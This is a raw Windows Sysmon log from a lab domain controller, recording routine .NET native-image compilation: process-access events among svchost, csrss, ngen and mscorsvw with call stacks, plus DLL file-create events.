9\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:35.787{59A5CD1D-9267-6005-9604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\3e4-0\System.Windows.Presentation.dll2021-01-18 13:51:35.787 10341000x80000000000000008841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.694{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9267-6005-9604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.678{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9267-6005-9604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.678{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9267-6005-9604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.631{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9267-6005-9504-00000000A301}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.615{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9267-6005-9504-00000000A301}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.615{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9267-6005-9504-00000000A301}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:35.553{59A5CD1D-9267-6005-9404-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a50-0\System.Windows.Input.Manipulations.dll2021-01-18 13:51:35.553 10341000x80000000000000008834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.459{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9267-6005-9404-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.444{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9267-6005-9404-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.444{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9267-6005-9404-00000000A301}2640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.397{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9267-6005-9304-00000000A301}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.381{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9267-6005-9304-00000000A301}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.381{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9267-6005-9304-00000000A301}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:35.319{59A5CD1D-9267-6005-9204-00000000A301}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c34-0\System.Windows.Forms.DataVisualization.Design.dll2021-01-18 13:51:35.319 10341000x80000000000000008827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.178{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9267-6005-9204-00000000A301}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.162{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9267-6005-9204-00000000A301}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.162{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9267-6005-9204-00000000A301}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.100{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9267-6005-9104-00000000A301}1512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.100{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9267-6005-9104-00000000A301}1512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.100{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9267-6005-9104-00000000A301}1512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:36.194{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9268-6005-9804-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:36.194{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9268-6005-9804-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:36.194{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9268-6005-9804-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:37.819{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9269-6005-9A04-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:37.803{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9269-6005-9A04-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 